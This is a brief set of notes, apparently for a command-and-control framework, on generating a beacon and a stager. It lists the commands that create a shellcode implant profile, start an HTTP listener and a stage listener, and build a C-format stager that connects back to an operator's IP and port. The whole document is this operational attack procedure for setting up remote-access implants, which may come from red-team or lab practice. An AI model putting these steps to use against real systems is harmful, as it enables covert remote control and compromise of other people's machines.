Generate a simple beacon

Generate a stager

  1. Creating a profile
    1. profiles new --http IP:PORT1 --skip-symbols --format shellcode demo
  2. Setting up the listener for the C3 communication
    1. http -L IP -l PORT1
  3. Setting up the stager listener for the rest of the payload
    1. stage-listener --url tcp://IP:PORT2 --profile demo
  4. Generating the stager payload
    1. generate stager --lhost IP --lport PORT2 --arch amd64 --format c